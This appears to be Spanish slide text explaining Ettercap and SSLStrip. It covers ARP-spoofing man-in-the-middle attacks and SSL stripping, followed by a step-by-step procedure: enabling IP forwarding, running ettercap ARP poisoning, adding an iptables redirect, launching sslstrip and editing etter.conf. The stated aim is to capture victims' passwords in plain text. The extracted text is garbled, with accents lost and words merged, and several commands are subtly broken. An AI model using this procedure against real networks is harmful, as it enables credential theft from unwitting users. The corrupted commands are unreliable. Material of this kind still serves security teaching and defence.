12

3

ROBERT PUICAN GUTIERREZ

Ettercap Ettercap es un interceptor/sniffer/registrador para

LANs con switch. Soporta direcciones activas y pasivasde varios protocolos (incluso aquellos cifrados, comoSSH y HTTPS).

Tambin hace posible la inyeccin de datos en unaconexin establecida y filtrado al vuelo aunmanteniendo la conexin sincronizada gracias a supoder para establecer un Ataque Man-in-the-middle(Spoofing). Muchos modos de sniffing fueronimplementados para darnos un conjunto deherramientas poderoso y completo de sniffing.

Funciones Inyeccin de caracteres en una conexin establecida emulando

comandos o respuestas mientras la conexin est activa. Compatibilidad con SSH1: puede interceptar users y passwords

incluso en conexiones "seguras" con SSH. Compatibilidad con HTTPS: intercepta conexiones mediante

http SSL (supuestamente seguras) incluso si se establecen atravs de un proxy.

Intercepta trfico remoto mediante un tnel GRE: si la conexinse establece mediante un tnel GRE con un router Cisco, puedeinterceptarla y crear un ataque "Man in the Middle".

"Man in the Middle" contra tneles PPTP (Point-to-PointTunneling Protocol).

Plataforma: Linux / Windows

Soporte de Plug-ins

Colector de contraseas en: Telnet, FTP, POP, Rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake3, MSN, YMSG.

Filtrado y sustitucin de paquetes. OS fingerprint: es decir, deteccin del sistema operativo

remoto. Mata conexiones. Escaneo de LAN: hosts, puertos abiertos, servicios... Busca otros envenenamientos en la misma red. Port Stealing (robo de puertos): es un nuevo mtodo para el

sniff en redes con switch, sin envenenamiento ARP".

Ettercap nos propone dos modos, el por defecto(unified sniff) o el bridged sniff, unos siendointeractivo y el otro no.

Una vez que empieza a rastrear el trfico, obtendrs unlistado de todas las conexiones activas, junto a unaserie de atributos acerca de su estado (active, idle,killed, etc.). El asterisco indica que una contrasea fuerecogida en esa conexin.

SSLSTRIP La definicin de SSL Strip es variada, intentaremos acercarnos a la realidad

prctica que es lo que ms nos puede interesar. SSL Strip consiste en hacer creer al usuario que est bajo una conexin segura,

ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puedefalsificarlo, o por que el usuario no se fija si est bajo trfico cifrado o no.

Cuando un atacante lanza SSL Strip sobre una vctima, sta sigue navegandofelizmente por la red. El problema viene cuando se conecta a una pgina bajoHTTPS, la vctima puede observar como el HTTPS ha desaparecido de sunavegador, si no se fija en ese pequeo detalle y se autentifique en algn sitio,sus credenciales irn en texto plano hacia la vctima.

Para que se vea lo que ocurre realmente se explica a continuacin, el recuadrocon SSL Strip es el atacante realizando un MiTM. El browser de la vctimarealizar una peticin que el atacante interceptar, entonces SSL Strip realizarla peticin correcta al web server, y la respuesta al navegador de la vctima seenva bajo HTTP y no bajo HTTPS. Se observa que SSL Strip aprovecha el pasode HTTP a HTTPS para realizar sus fechoras.

SSLSTRIP

SSLSTRIP

Secuencia de Datos

Procedimiento macchanger echo 1 > /proc/sys/net/ipv4/ip-forward gedit /usr/local/etc/etter.conf ettercap Tql eth0 M arp:remote // // iptables -t nat -A PREROUTING i eth0 -p tcp --destination-port

80 -j REDIRECT --to-ports 10000 Sslstrip a k f l 10000

Luego para iniciarlo python sslstrip.py -a -k f l 10000Por lo que:-a Registra todo el trfico SSL y HTTP desde el server.-k Mata sesiones en curso.-f Sustituye el favicon en conecciones seguras

Procedimiento gedit /usr/local/etc/etter.conf As luce cuando esta en su configuracin original.... debe de quedar as:

ec_uid=0ec_gid=0

#---------------# Linux#---------------# if you use ipchains:

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT

--to-port %rport"redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT

--to-port %rport"

Lo que hicimos fue des-comentar las lineas:redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"